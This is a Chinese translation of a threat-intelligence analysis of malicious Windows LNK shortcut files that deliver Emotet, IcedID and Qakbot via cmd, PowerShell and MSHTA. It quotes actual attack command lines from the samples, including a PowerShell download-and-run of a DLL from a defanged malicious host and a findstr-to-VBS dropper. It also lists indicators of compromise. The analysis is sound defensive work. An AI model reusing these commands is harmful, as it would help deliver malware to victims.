关键词
LNK文件、恶意软件、Emotet、Qakbot、IcedID
LNK文件在Windows系统中用于创建链接到文件、文件夹或应用程序的快捷方式。LNK文件基于Shell Link二进制文件格式,包含了用于访问另一个数据对象的信息。这些文件可以使用右键菜单中的创建快捷方式选项手动创建,也可以在应用程序运行时自动创建。许多工具可以用来创建LNK文件,其中就有专门为恶意目的构建的“lnkbombs”工具。
在2022年第二季度,McAfee Labs发现使用LNK文件投放的恶意软件有所增加。利用了LNK的攻击者能够轻易地投放Emotet、Qakbot、IcedID、Bazarloaders等恶意软件。
图1 从4月到5月LNK攻击的地理位置
本文将分析攻击者使用LNK文件投放恶意软件的过程,下面是这些LNK文件在普通用户眼中的截图。
图2 普通用户看到的LNK文件
随着微软默认禁用Office宏,恶意软件作者现在正在改进他们的诱饵技术,包括利用LNK文件来实现他们的目标。
攻击者使用垃圾邮件和恶意URL将LNK文件投放给受害者。这些文件通过PowerShell、CMD 和MSHTA等合法应用程序下载恶意文件。
本文将通过分析最近的三个恶意软件活动Emotet、IcedID和Qakbot来展示这些文件的危险程度。
(1)感染链
图3 Emotet通过LNK文件感染链投放
(2)威胁分析
图4 用户收到带有恶意LNK附件的电子邮件
在图4中可以看到诱饵消息和恶意的LNK附件。
用户由于主动访问了LNK附件而被感染。为了更深入地分析,下面将展示LNK文件的属性:
图5 Emotet LNK示例的属性
如图5所示,目标(Target)一栏显示LNK调用了Windows命令处理器(cmd.exe)。属性中的目标路径仅展示255个字符,然而命令行参数最多可达4096个字符。因此,攻击者可以利用这一优势隐蔽地传递长参数。
在这一例子中,参数为/v:on /c findstr “glKmfOKnQLYKnNs.*” “Form 04.25.2022, US.lnk” > “%tmp%YlScZcZKeP.vbs” & “%tmp%YlScZcZKeP.vbs”
图6 Emotet LNK文件的内容
一旦findstr.exe工具接收到相应的字符串,LNK文件的其余内容将保存在%temp%文件夹下的.VBS文件中,随机名称为YIScZcZKeP.vbs。
cmd.exe命令的下一部分使用Windows脚本宿主(wscript.exe)调用VBS文件,以下载64位的Emotet DLL有效载荷。
(1)感染链
图7 IcedID通过LNK文件感染链投放
(2)威胁分析
此攻击是攻击者将LNK、PowerShell和MSHTA工具链接起来,以攻击其受害者的完美示例。
在PowerShell LNK中有一个经过高度混淆的参数,可以在图8中看到LNK属性的目标部分:
图8 IcedID LNK样本的属性
该参数非常长,在目标部分中无法完全显示。整个混淆参数在运行时被解密,然后使用参数hxxps://hectorcalle[.]com/093789.hta执行 MSHTA。
下载的HTA文件调用另一个具有类似混淆参数的PowerShell,连接到Uri为hxxps://hectorcalle[.]com/listbul.exe的地址。
该Uri会在%HOME%文件夹中下载EXE格式的64位IcedID安装程序。
(1)感染链
图9 QAKBOT通过LNK文件感染链投放
(2)威胁分析
这次攻击将展示攻击者如何直接硬编码恶意URL,以此来与PowerShell等工具一起运行,并下载主要的有效载荷。
图10 Qakbot LNK样本的属性
在图 10 中,目标部分完整的参数为
”C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -NoExit iwr -Uri hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png -OutFile $env:TEMPtest.dll;Start-Process rundll32.exe $env:TEMPtest.dll,jhbvygftr”
此PowerShell LNK使用Invoke-WebRequest命令连接到hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png,并将下载的内容保存在%temp%文件夹下的test.dll文件中。
这就是主要的Qakbot DLL有效载荷,然后使用rundll32工具执行。
如我们在上述三个威胁活动中看到的那样,攻击者对Windows快捷方式LNK文件的滥用会威胁到普通用户。恶意LNK通常使用PowerShell和CMD连接到恶意URL以下载恶意载荷,LNK与PowerShell、CMD、MSHTA等结合使用,会对受害者的机器造成严重损害。
本文在这里只介绍了三个威胁系列,但已经能够看出这些文件正使用其他Windows工具来投放各种类型的恶意载荷。这些类型的攻击仍在不断发展,因此每个用户在使用LNK快捷方式文件时都必须进行彻底的检查,保持他们的操作系统和防病毒软件是最新的版本,时刻提防网络钓鱼邮件和恶意的链接及附件。
类型 |
SHA-256 | 扫描器 |
行为 |
Emotet LNK |
02eccb041972825d51b71e88450b094cf692b9f5f46f5101ab3f2210e2e1fe71 | WSS |
LNK/Emotet-FSE |
IcedID LNK |
24ee20d7f254e1e327ecd755848b8b72cd5e6273cf434c3a520f780d5a098ac9 | WSS |
LNK/Agent-FTA Suspicious ZIP!lnk
|
Qakbot LNK |
b5d5464d4c2b231b11b594ce8500796f8946f1b3a10741593c7b872754c2b172 | WSS |
LNK/Agent-TSR
|
URL |
hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/ hxxp://filmmogzivota[.]rs/SpryAssets/gDR/ hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm9JD/ hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/ hxxp://cipro[.]mx/prensa/siZP69rBFmibDvuTP1/ hxxps://hectorcalle[.]com/093789.hta hxxps://hectorcalle[.]com/listbul.exe hxxps://green-a-thon[.]com/LosZkUvr/B.png |
WebAdvisor |
All URLs Blocked |
编辑|张逸鸣
审校|何双泽、金矢
本文为CNTIC编译整理,不代表本公众号观点,转载请保留出处与链接。联系信息进入公众号后点击“关于我们”可见。
原文始发于微信公众号(国家网络威胁情报共享开放平台):日益流行的快捷方式恶意软件
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论